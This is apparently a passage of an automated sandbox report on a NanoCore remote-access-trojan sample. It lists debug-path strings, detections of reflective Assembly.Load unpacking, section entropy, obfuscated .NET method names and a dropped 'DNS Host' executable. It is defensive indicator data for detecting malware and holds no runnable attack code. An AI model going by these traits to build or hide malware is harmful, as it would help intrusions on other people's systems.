Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: nD2ozRD7MN.exe, 00000005.00000002.3558104090.00000000078A0000.00000004.08000000.00040000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3557767120.0000000007850000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: nD2ozRD7MN.exe, 00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: Accessibility.pdbP source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Core.ni.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Configuration.pdbt^ source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: mscorlib.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: NanoCoreStressTester.pdbxX source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Drawing.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Management.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Management.ni.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: nD2ozRD7MN.exe, 00000005.00000002.3557822095.0000000007860000.00000004.08000000.00040000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: MyClientPluginNew.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3557903252.0000000007870000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: MyClientPlugin.pdbL0 source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER3715.tmp.dmp.25.dr
Source:	Binary string: MyClientPlugin.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.ni.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: NanoCoreBase.pdb source: WER3715.tmp.dmp.25.dr
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: nD2ozRD7MN.exe, 00000005.00000002.3557957967.0000000007880000.00000004.08000000.00040000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.pdby source: WER3715.tmp.dmp.25.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3715.tmp.dmp.25.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, hZt63p0jP4sfuIZbVJ.cs	.Net Code: AQvIhqP4VfSN9dCMQSe System.Reflection.Assembly.Load(byte[])
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, hZt63p0jP4sfuIZbVJ.cs	.Net Code: AQvIhqP4VfSN9dCMQSe System.Reflection.Assembly.Load(byte[])
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, --qjIje6jGWLd2EOkfZXKqBbg--.cs	.Net Code: _0023_003Dqf3c4WtE_0024_0024thN5QyBMvo3u0lth2VF5hmfUsIv1r8yRkg_003D System.Reflection.Assembly.Load(byte[])
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, --qjIje6jGWLd2EOkfZXKqBbg--.cs	.Net Code: _0023_003Dq_FL69pQf17BUSAFbWYu1SStMAbdu_0024R1GJ8VY8UL5_EA_003D System.Reflection.Assembly.Load(byte[])
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, --qxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecU-.cs	.Net Code: _0023_003DqKU0J1fiP8KA33eFK1owekQ_003D_003D System.Reflection.Assembly.Load(byte[])
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, --qjIje6jGWLd2EOkfZXKqBbg--.cs	.Net Code: _0023_003Dqf3c4WtE_0024_0024thN5QyBMvo3u0lth2VF5hmfUsIv1r8yRkg_003D System.Reflection.Assembly.Load(byte[])
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, --qjIje6jGWLd2EOkfZXKqBbg--.cs	.Net Code: _0023_003Dq_FL69pQf17BUSAFbWYu1SStMAbdu_0024R1GJ8VY8UL5_EA_003D System.Reflection.Assembly.Load(byte[])
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, --qxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecU-.cs	.Net Code: _0023_003DqKU0J1fiP8KA33eFK1owekQ_003D_003D System.Reflection.Assembly.Load(byte[])
Source: 0.2.nD2ozRD7MN.exe.73f0000.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, hZt63p0jP4sfuIZbVJ.cs	.Net Code: AQvIhqP4VfSN9dCMQSe System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_0741E809 pushad ; retn 0598h	0_2_0741E871
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_07F34910 push eax; ret	0_2_07F3491D
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_025A0CF7 push edi; iretd	9_2_025A0D16
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059BFC17 push esp; retf	9_2_059BFC25
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_07D12F58 push esp; retf	15_2_07D12F65
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_00F210BF push esp; retf	19_2_00F210CD
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BC0882 push es; ret	19_2_06BC0890

Source: nD2ozRD7MN.exe	Static PE information: section name: .text entropy: 7.690214537258505
Source: dnshost.exe.5.dr	Static PE information: section name: .text entropy: 7.690214537258505

Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, maxN2I2ang3jEH757O.cs	High entropy of concatenated method names: 'mTrdhBXpF4', 'Uf1dvMak23', 'vSidtOatJ0', 'p4wdqBNnLO', 'NpYdmQUreU', 'rnJdS3B1XV', 'ECmdN2GKAF', 'tVGdPYOqyU', 'GnxdOqAGuD', 'PDadbpgCog'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, US6vhyXc0YwLr8UnSM.cs	High entropy of concatenated method names: 'lnp168VhyI', 'bcW1Xo6rwu', 'VS58Vv8QdM', 'h3g8QqWoIm', 'E6B1l0CCAg', 'BoY1oLmnBt', 'olG1KMBD8W', 'Ly41gXEbJT', 'hA21Io9X9j', 'yAB1B7MsXE'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, mNWvBxQb6b2JvYkMbX.cs	High entropy of concatenated method names: 'DV20yi0xth', 'E9T0WIesWi', 'yog0r4cdNd', 'W0j0dK2Hdo', 'mKh0fnd4Yo', 'Aqfrsio5UX', 'hZprkRKOyx', 'oB8rMduVlA', 'Kndr6AOlpA', 'yT3reir19m'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, hmnpKV4OT08QcYcFDi.cs	High entropy of concatenated method names: 'HLQtKEkRF', 'TyXqIZNwB', 'sEMSF6VNy', 'N3jNNHPox', 'pGmOQrRUl', 'oAEb2I0Fj', 'JCS7LUFGC0ZJcIlWaJ', 'EZig26MErNEjwa1SZA', 'qai8Ql0DG', 'CQDujU20t'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, sejACtzgJPd1hCmShE.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NhtRYFd9VG', 'NlwRZhLeHR', 'loRRAb3pZf', 'IeuR1qwA86', 'mXIR8NWT4e', 'hbBRRLbiBb', 'iUpRukC26G'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, hZt63p0jP4sfuIZbVJ.cs	High entropy of concatenated method names: 'fAGcyHnxI3', 'N1jc39OgqO', 'RNvcWAgfcK', 'eLscHe7ytG', 'VhmcrqByje', 'D3Uc0ryRTY', 'QDWcdHKVHK', 'QnZcfYsJ6U', 'OJ3cxuBwS6', 'q5DcjoVvw4'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, FLL3g3KMc42c7pyt7wv.cs	High entropy of concatenated method names: 'ibmRhjRH6d', 'epURvn2DOn', 'thaRt8i0Nj', 'Vu6Rqa8RoE', 'AbRRmDwWRX', 'jn9RSqHr8g', 'q2mRNLX0e9', 'RfPRPcBwou', 'JovROEmaCT', 'KtKRby28k8'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, VID7nldnwpTNG5dFHK.cs	High entropy of concatenated method names: 'IFwrmTseM1', 'JYfrNtoJoL', 'mBgHCoMRBq', 'xx1H9rpKwO', 'LIPH7i06GC', 'NeAHpTqRIP', 'kntHLLZ79v', 'di0HUhDIcZ', 'bFjHiyhc2u', 'sT8HnDGMlR'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, GedG3oFM6w0mMFgBOg.cs	High entropy of concatenated method names: 'OMGZnAP8mE', 'sbbZoDBbe4', 'Fi3ZgBHMst', 'IWOZInCVXF', 'H2BZaxwwJ2', 'VJkZCs8sJB', 'cERZ9pWVDw', 'rXMZ77ETtu', 'f3cZpVZL18', 'blcZLXA4vQ'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, t5HF8XtGmyEDuidHJ0.cs	High entropy of concatenated method names: 'qySYP6I632', 'DevYOOeCf6', 'YveY21qSxF', 'cY1YaoDXd7', 'xMAY9dNc5Z', 'CJ6Y7ry5KK', 'Gj4YL1vdLq', 'iabYUi2U5b', 'r4jYnTmlsQ', 'U51YlixjCl'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, CY9TxsrJ04L7H3BEfv.cs	High entropy of concatenated method names: 'kYhd3e1NQg', 'p9tdHSLcEM', 'AYud0v1hLV', 'lpa0X6y3qy', 'mCh0zFHDQE', 'heVdVlVabA', 'w4WdQWp8HX', 'uJ8dEBmyB4', 'MaFdcHK6AI', 'J6GdwlN0gS'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, Xkj9BfuZTQp0G2lgKt.cs	High entropy of concatenated method names: 'MhtWgr1cYr', 'rI1WIbktqR', 'LDJWB40vc5', 'b5fWTq5Ymc', 'wCLWslRjuw', 'xKwWkNt5w9', 'rGHWMorWLc', 'TnDW667AAb', 'y8VWeXjtRA', 'dgVWXufZKv'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, CHyvnWHAn70aLa7jWH.cs	High entropy of concatenated method names: 'p5jRQ32Mxg', 'GgKRcpscwp', 'ubmRwdVl3G', 'RecR35tAil', 'o3JRWUpe2f', 'VhhRr03CjE', 'JFyR09v6eK', 'RpY8ME4Kky', 'kdH864oVPA', 'wKN8eogT9p'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, kRNAcJvVOeSRFgFQ6J.cs	High entropy of concatenated method names: 'ToString', 'F0gAlAcxul', 'BWuAadNFtb', 'z4PACfa1jE', 'vIWA9ldnXq', 'OFDA78MKwZ', 'JAIAp3u0K7', 'K7NALjRZdx', 'KVTAUCJrqI', 'RroAiTWPcH'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, Y71HWoq8alU03bopHX.cs	High entropy of concatenated method names: 'Hbs830Uyo2', 'eps8WKnsAI', 'gjj8Hp41pL', 'PuQ8rA2I1h', 'KYp80rRLeO', 'Uer8dR9ndy', 'xL88f7DlSJ', 'rOC8xxkmZj', 'Dxq8jU8Te9', 'X708FMhBRZ'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, GPreDaRCfFsC4saotE.cs	High entropy of concatenated method names: 'O7O82kNxOU', 'knJ8aiQnmB', 'jZo8C38Vl7', 'qtK895ktY3', 'wKd8geoEgs', 'mn2878CvQk', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, fykWaJN4YqARddZSYT.cs	High entropy of concatenated method names: 'RSGQdN6Aii', 'eBPQfnCA7q', 'E92Qjld9wR', 'QbNQFZKCNK', 'zZ7QZcyNfw', 'KWnQAol8wJ', 'EIdZZyAqXCl8JVkrF1', 'oHaa00ax5nc60rNfT4', 'xaQQQNdMlv', 'RauQcg3RJf'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, vb78FfKwGRxSVQKyGV5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i6Vugi9GFh', 'TKsuIWiolU', 'DS9uBD69FY', 'om0uT9iCrB', 'sqtus3BkW7', 'FONukN9CW8', 'dZZuMgkZve'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, gjKo6oOIHk6yJCaogO.cs	High entropy of concatenated method names: 'Dispose', 'CnJQemUAM1', 'M3dEaJg5f6', 'CLpJJBkt3J', 'gKyQXPBEAk', 'icwQzfUg7R', 'ProcessDialogKey', 'iAOEVS1iMT', 'MQdEQaVB6k', 'lunEEHxh4l'
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, v23u6iYSQ5Vfhhyo6Y.cs	High entropy of concatenated method names: 'u6QHqnYCjW', 'SVpHSHLtGB', 'NnhHPFW3iE', 'e2MHOC3YlT', 'NauHZwdBpL', 'rFYHAlBq4p', 'iGRH1TaI3D', 'Jq3H8jeAwu', 'C8ZHRXNDTY', 'BrkHuWTDyJ'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, maxN2I2ang3jEH757O.cs	High entropy of concatenated method names: 'mTrdhBXpF4', 'Uf1dvMak23', 'vSidtOatJ0', 'p4wdqBNnLO', 'NpYdmQUreU', 'rnJdS3B1XV', 'ECmdN2GKAF', 'tVGdPYOqyU', 'GnxdOqAGuD', 'PDadbpgCog'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, US6vhyXc0YwLr8UnSM.cs	High entropy of concatenated method names: 'lnp168VhyI', 'bcW1Xo6rwu', 'VS58Vv8QdM', 'h3g8QqWoIm', 'E6B1l0CCAg', 'BoY1oLmnBt', 'olG1KMBD8W', 'Ly41gXEbJT', 'hA21Io9X9j', 'yAB1B7MsXE'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, mNWvBxQb6b2JvYkMbX.cs	High entropy of concatenated method names: 'DV20yi0xth', 'E9T0WIesWi', 'yog0r4cdNd', 'W0j0dK2Hdo', 'mKh0fnd4Yo', 'Aqfrsio5UX', 'hZprkRKOyx', 'oB8rMduVlA', 'Kndr6AOlpA', 'yT3reir19m'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, hmnpKV4OT08QcYcFDi.cs	High entropy of concatenated method names: 'HLQtKEkRF', 'TyXqIZNwB', 'sEMSF6VNy', 'N3jNNHPox', 'pGmOQrRUl', 'oAEb2I0Fj', 'JCS7LUFGC0ZJcIlWaJ', 'EZig26MErNEjwa1SZA', 'qai8Ql0DG', 'CQDujU20t'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, sejACtzgJPd1hCmShE.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NhtRYFd9VG', 'NlwRZhLeHR', 'loRRAb3pZf', 'IeuR1qwA86', 'mXIR8NWT4e', 'hbBRRLbiBb', 'iUpRukC26G'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, hZt63p0jP4sfuIZbVJ.cs	High entropy of concatenated method names: 'fAGcyHnxI3', 'N1jc39OgqO', 'RNvcWAgfcK', 'eLscHe7ytG', 'VhmcrqByje', 'D3Uc0ryRTY', 'QDWcdHKVHK', 'QnZcfYsJ6U', 'OJ3cxuBwS6', 'q5DcjoVvw4'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, FLL3g3KMc42c7pyt7wv.cs	High entropy of concatenated method names: 'ibmRhjRH6d', 'epURvn2DOn', 'thaRt8i0Nj', 'Vu6Rqa8RoE', 'AbRRmDwWRX', 'jn9RSqHr8g', 'q2mRNLX0e9', 'RfPRPcBwou', 'JovROEmaCT', 'KtKRby28k8'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, VID7nldnwpTNG5dFHK.cs	High entropy of concatenated method names: 'IFwrmTseM1', 'JYfrNtoJoL', 'mBgHCoMRBq', 'xx1H9rpKwO', 'LIPH7i06GC', 'NeAHpTqRIP', 'kntHLLZ79v', 'di0HUhDIcZ', 'bFjHiyhc2u', 'sT8HnDGMlR'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, GedG3oFM6w0mMFgBOg.cs	High entropy of concatenated method names: 'OMGZnAP8mE', 'sbbZoDBbe4', 'Fi3ZgBHMst', 'IWOZInCVXF', 'H2BZaxwwJ2', 'VJkZCs8sJB', 'cERZ9pWVDw', 'rXMZ77ETtu', 'f3cZpVZL18', 'blcZLXA4vQ'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, t5HF8XtGmyEDuidHJ0.cs	High entropy of concatenated method names: 'qySYP6I632', 'DevYOOeCf6', 'YveY21qSxF', 'cY1YaoDXd7', 'xMAY9dNc5Z', 'CJ6Y7ry5KK', 'Gj4YL1vdLq', 'iabYUi2U5b', 'r4jYnTmlsQ', 'U51YlixjCl'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, CY9TxsrJ04L7H3BEfv.cs	High entropy of concatenated method names: 'kYhd3e1NQg', 'p9tdHSLcEM', 'AYud0v1hLV', 'lpa0X6y3qy', 'mCh0zFHDQE', 'heVdVlVabA', 'w4WdQWp8HX', 'uJ8dEBmyB4', 'MaFdcHK6AI', 'J6GdwlN0gS'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, Xkj9BfuZTQp0G2lgKt.cs	High entropy of concatenated method names: 'MhtWgr1cYr', 'rI1WIbktqR', 'LDJWB40vc5', 'b5fWTq5Ymc', 'wCLWslRjuw', 'xKwWkNt5w9', 'rGHWMorWLc', 'TnDW667AAb', 'y8VWeXjtRA', 'dgVWXufZKv'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, CHyvnWHAn70aLa7jWH.cs	High entropy of concatenated method names: 'p5jRQ32Mxg', 'GgKRcpscwp', 'ubmRwdVl3G', 'RecR35tAil', 'o3JRWUpe2f', 'VhhRr03CjE', 'JFyR09v6eK', 'RpY8ME4Kky', 'kdH864oVPA', 'wKN8eogT9p'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, kRNAcJvVOeSRFgFQ6J.cs	High entropy of concatenated method names: 'ToString', 'F0gAlAcxul', 'BWuAadNFtb', 'z4PACfa1jE', 'vIWA9ldnXq', 'OFDA78MKwZ', 'JAIAp3u0K7', 'K7NALjRZdx', 'KVTAUCJrqI', 'RroAiTWPcH'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, Y71HWoq8alU03bopHX.cs	High entropy of concatenated method names: 'Hbs830Uyo2', 'eps8WKnsAI', 'gjj8Hp41pL', 'PuQ8rA2I1h', 'KYp80rRLeO', 'Uer8dR9ndy', 'xL88f7DlSJ', 'rOC8xxkmZj', 'Dxq8jU8Te9', 'X708FMhBRZ'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, GPreDaRCfFsC4saotE.cs	High entropy of concatenated method names: 'O7O82kNxOU', 'knJ8aiQnmB', 'jZo8C38Vl7', 'qtK895ktY3', 'wKd8geoEgs', 'mn2878CvQk', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, fykWaJN4YqARddZSYT.cs	High entropy of concatenated method names: 'RSGQdN6Aii', 'eBPQfnCA7q', 'E92Qjld9wR', 'QbNQFZKCNK', 'zZ7QZcyNfw', 'KWnQAol8wJ', 'EIdZZyAqXCl8JVkrF1', 'oHaa00ax5nc60rNfT4', 'xaQQQNdMlv', 'RauQcg3RJf'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, vb78FfKwGRxSVQKyGV5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i6Vugi9GFh', 'TKsuIWiolU', 'DS9uBD69FY', 'om0uT9iCrB', 'sqtus3BkW7', 'FONukN9CW8', 'dZZuMgkZve'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, gjKo6oOIHk6yJCaogO.cs	High entropy of concatenated method names: 'Dispose', 'CnJQemUAM1', 'M3dEaJg5f6', 'CLpJJBkt3J', 'gKyQXPBEAk', 'icwQzfUg7R', 'ProcessDialogKey', 'iAOEVS1iMT', 'MQdEQaVB6k', 'lunEEHxh4l'
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, v23u6iYSQ5Vfhhyo6Y.cs	High entropy of concatenated method names: 'u6QHqnYCjW', 'SVpHSHLtGB', 'NnhHPFW3iE', 'e2MHOC3YlT', 'NauHZwdBpL', 'rFYHAlBq4p', 'iGRH1TaI3D', 'Jq3H8jeAwu', 'C8ZHRXNDTY', 'BrkHuWTDyJ'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, maxN2I2ang3jEH757O.cs	High entropy of concatenated method names: 'mTrdhBXpF4', 'Uf1dvMak23', 'vSidtOatJ0', 'p4wdqBNnLO', 'NpYdmQUreU', 'rnJdS3B1XV', 'ECmdN2GKAF', 'tVGdPYOqyU', 'GnxdOqAGuD', 'PDadbpgCog'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, US6vhyXc0YwLr8UnSM.cs	High entropy of concatenated method names: 'lnp168VhyI', 'bcW1Xo6rwu', 'VS58Vv8QdM', 'h3g8QqWoIm', 'E6B1l0CCAg', 'BoY1oLmnBt', 'olG1KMBD8W', 'Ly41gXEbJT', 'hA21Io9X9j', 'yAB1B7MsXE'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, mNWvBxQb6b2JvYkMbX.cs	High entropy of concatenated method names: 'DV20yi0xth', 'E9T0WIesWi', 'yog0r4cdNd', 'W0j0dK2Hdo', 'mKh0fnd4Yo', 'Aqfrsio5UX', 'hZprkRKOyx', 'oB8rMduVlA', 'Kndr6AOlpA', 'yT3reir19m'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, hmnpKV4OT08QcYcFDi.cs	High entropy of concatenated method names: 'HLQtKEkRF', 'TyXqIZNwB', 'sEMSF6VNy', 'N3jNNHPox', 'pGmOQrRUl', 'oAEb2I0Fj', 'JCS7LUFGC0ZJcIlWaJ', 'EZig26MErNEjwa1SZA', 'qai8Ql0DG', 'CQDujU20t'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, sejACtzgJPd1hCmShE.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NhtRYFd9VG', 'NlwRZhLeHR', 'loRRAb3pZf', 'IeuR1qwA86', 'mXIR8NWT4e', 'hbBRRLbiBb', 'iUpRukC26G'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, hZt63p0jP4sfuIZbVJ.cs	High entropy of concatenated method names: 'fAGcyHnxI3', 'N1jc39OgqO', 'RNvcWAgfcK', 'eLscHe7ytG', 'VhmcrqByje', 'D3Uc0ryRTY', 'QDWcdHKVHK', 'QnZcfYsJ6U', 'OJ3cxuBwS6', 'q5DcjoVvw4'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, FLL3g3KMc42c7pyt7wv.cs	High entropy of concatenated method names: 'ibmRhjRH6d', 'epURvn2DOn', 'thaRt8i0Nj', 'Vu6Rqa8RoE', 'AbRRmDwWRX', 'jn9RSqHr8g', 'q2mRNLX0e9', 'RfPRPcBwou', 'JovROEmaCT', 'KtKRby28k8'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, VID7nldnwpTNG5dFHK.cs	High entropy of concatenated method names: 'IFwrmTseM1', 'JYfrNtoJoL', 'mBgHCoMRBq', 'xx1H9rpKwO', 'LIPH7i06GC', 'NeAHpTqRIP', 'kntHLLZ79v', 'di0HUhDIcZ', 'bFjHiyhc2u', 'sT8HnDGMlR'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, GedG3oFM6w0mMFgBOg.cs	High entropy of concatenated method names: 'OMGZnAP8mE', 'sbbZoDBbe4', 'Fi3ZgBHMst', 'IWOZInCVXF', 'H2BZaxwwJ2', 'VJkZCs8sJB', 'cERZ9pWVDw', 'rXMZ77ETtu', 'f3cZpVZL18', 'blcZLXA4vQ'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, t5HF8XtGmyEDuidHJ0.cs	High entropy of concatenated method names: 'qySYP6I632', 'DevYOOeCf6', 'YveY21qSxF', 'cY1YaoDXd7', 'xMAY9dNc5Z', 'CJ6Y7ry5KK', 'Gj4YL1vdLq', 'iabYUi2U5b', 'r4jYnTmlsQ', 'U51YlixjCl'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, CY9TxsrJ04L7H3BEfv.cs	High entropy of concatenated method names: 'kYhd3e1NQg', 'p9tdHSLcEM', 'AYud0v1hLV', 'lpa0X6y3qy', 'mCh0zFHDQE', 'heVdVlVabA', 'w4WdQWp8HX', 'uJ8dEBmyB4', 'MaFdcHK6AI', 'J6GdwlN0gS'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, Xkj9BfuZTQp0G2lgKt.cs	High entropy of concatenated method names: 'MhtWgr1cYr', 'rI1WIbktqR', 'LDJWB40vc5', 'b5fWTq5Ymc', 'wCLWslRjuw', 'xKwWkNt5w9', 'rGHWMorWLc', 'TnDW667AAb', 'y8VWeXjtRA', 'dgVWXufZKv'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, CHyvnWHAn70aLa7jWH.cs	High entropy of concatenated method names: 'p5jRQ32Mxg', 'GgKRcpscwp', 'ubmRwdVl3G', 'RecR35tAil', 'o3JRWUpe2f', 'VhhRr03CjE', 'JFyR09v6eK', 'RpY8ME4Kky', 'kdH864oVPA', 'wKN8eogT9p'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, kRNAcJvVOeSRFgFQ6J.cs	High entropy of concatenated method names: 'ToString', 'F0gAlAcxul', 'BWuAadNFtb', 'z4PACfa1jE', 'vIWA9ldnXq', 'OFDA78MKwZ', 'JAIAp3u0K7', 'K7NALjRZdx', 'KVTAUCJrqI', 'RroAiTWPcH'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, Y71HWoq8alU03bopHX.cs	High entropy of concatenated method names: 'Hbs830Uyo2', 'eps8WKnsAI', 'gjj8Hp41pL', 'PuQ8rA2I1h', 'KYp80rRLeO', 'Uer8dR9ndy', 'xL88f7DlSJ', 'rOC8xxkmZj', 'Dxq8jU8Te9', 'X708FMhBRZ'
